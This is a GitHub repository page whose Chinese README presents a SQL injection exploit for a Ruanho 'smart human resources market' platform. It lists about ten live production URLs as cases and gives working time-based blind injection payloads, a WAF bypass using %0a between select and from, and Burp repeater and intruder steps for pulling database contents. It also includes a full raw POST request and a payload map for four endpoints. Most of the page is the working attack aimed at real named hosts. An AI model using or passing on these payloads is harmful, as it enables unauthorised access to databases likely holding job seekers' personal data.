Skip to content

Hpterosaur/RPCSQLexp

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
EXP
EXP
 
 
README.md
README.md
 
 

Repository files navigation

重庆软狐信息技术有限公司智慧人力资源市场服务统一平台存在SQL注入漏洞 在如下三个子目录接口存在SQL注入(通过特殊手段绕过WAF实现时间延时盲注) 目前所有版本都可复现 "/Admin/Home/CT_SysAdminUpdatePwd_new",         "/Website/home/CT_GetNewsInfo",         "/Website/home/CT_GetNewsInfo",         "/Website/home/CT_GetReMenNewsList"

image image

案例1: image

https://tn.ruanho.com/Website/home/CT_GetNewsInfo POST_payload: leaveId=if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)&pageIndex=1&pageSize=6&text= image

案例2 https://hw.naqjyhrcfwj.cn/Website/home/CT_GetNewsInfo POST_payload: leaveId=if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)&pageIndex=1&pageSize=6&text=

案例3: https://bsg.ruanho.com/Website/home/CT_GetNewsInfo POST_payload: leaveId=if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)&pageIndex=1&pageSize=6&text= image image

案例4: https://www.pxrc.com.cn/Website/home/CT_GetNewsInfo POST_payload: leaveId=if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)&pageIndex=1&pageSize=6&text= image

image

案例5: https://cqtl.ruanho.com/Website/home/CT_GetNewsInfo POST_payload: leaveId=if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)&pageIndex=1&pageSize=6&text= 步骤同上 案例6: http://tnwx.ruanho.com/Website/home/CT_GetNewsInfo 案例7: http://183.230.235.30:91/Website/home/CT_GetNewsInfo 案例8: https://tn.ruanho.com/Website/home/CT_GetNewsInfo 案例9: https://ls.xzrcfw.com/Website/home/CT_GetNewsInfo 案例10: http://cqdzjy.ruanho.com:90/Website/home/CT_GetNewsInfo

复现步骤: 1.找存在sql注入的子目录接口 访问url+如下4个子目录如果返回500系统错误即该接口大概率存在sql注入 "/Admin/Home/CT_SysAdminUpdatePwd_new",         "/Website/home/CT_GetNewsInfo",         "/Website/home/CT_GetNewsInfo",         "/Website/home/CT_GetReMenNewsList"

image

访问url+/Website/home/CT_GetReMenNewsList接口拼接url https://hw.naqjyhrcfwj.cn:8022/Website/Home/CT_GetReMenNewsList 2.使用burp抓包,放入repeater中 3.将HTTP方式修改为POST 4.并在headers中添加头Content-Type: application/x-www-form-urlencoded image

5.构造Post的payload 该接口post传输参数为: leaveId={GetReMenNewsList_leaveId}&pageIndex=1&pageSize=5&queryType=0 leaveId为注入点 当构造select from的语句时会被waf拦截 image

绕过手段为在select from之间添加%0a 才可进行绕过即(并且添加Content-Type: application/x-www-form-urlencoded头) Select%20xxxx%0afrom%20xxxxx 查询表名语句为: if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0) image

6.后续通过intruder模块进行爆破出数据库的每一位字符串

image

部分数据库信息如下

image

备注POST包 SQLmap无法跑出此注入 POST包 POST /Website/Home/CT_GetReMenNewsList HTTP/1.1 Host: hw.naqjyhrcfwj.cn:8022 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: ASP.NET_SessionId=mwqo1drvjsw053hsxz53hzz5 Connection: close Content-Length: 187 Content-Type: application/x-www-form-urlencoded

leaveId=if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)&pageIndex=1&pageSize=5&queryType=0

各子目录对应payload如下:依次按顺序对应  target_subdirectories = [         "/Admin/Home/CT_SysAdminUpdatePwd_new",         "/Website/home/CT_GetNewsInfo",         "/Website/home/CT_GetNewsInfo",         "/Website/home/CT_GetReMenNewsList"     ]

payloads = [         "LginPwdstr=%5C147%5C60%5C60%5C144%5C120%5C141%5C44%5C44%5C167%5C60%5C162%5C104&code={code}&oldpwd=%5C147%5C60%5C60%5C144%5C120%5C141%5C44%5C44%5C167%5C60%5C162%5C104",         "leaveId={GetNewsInfo_leaveId}&pageIndex=1&pageSize=6&text=",         "leaveId=52&pageIndex=1&pageSize=6&text={text}",         "leaveId={GetReMenNewsList_leaveId}&pageIndex=1&pageSize=5&queryType=0"     ]

sql_payloads = {"code": "0'XOR(if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0))XOR'Z",                     "GetNewsInfo_leaveId":"if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)",                     "text":"0'XOR(if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0))XOR'Z",                     "GetReMenNewsList_leaveId":"if(ascii(substr((select%20table_name%0afrom%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>0%2Csleep(6)%2C0)"                     }

About

sql exp

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published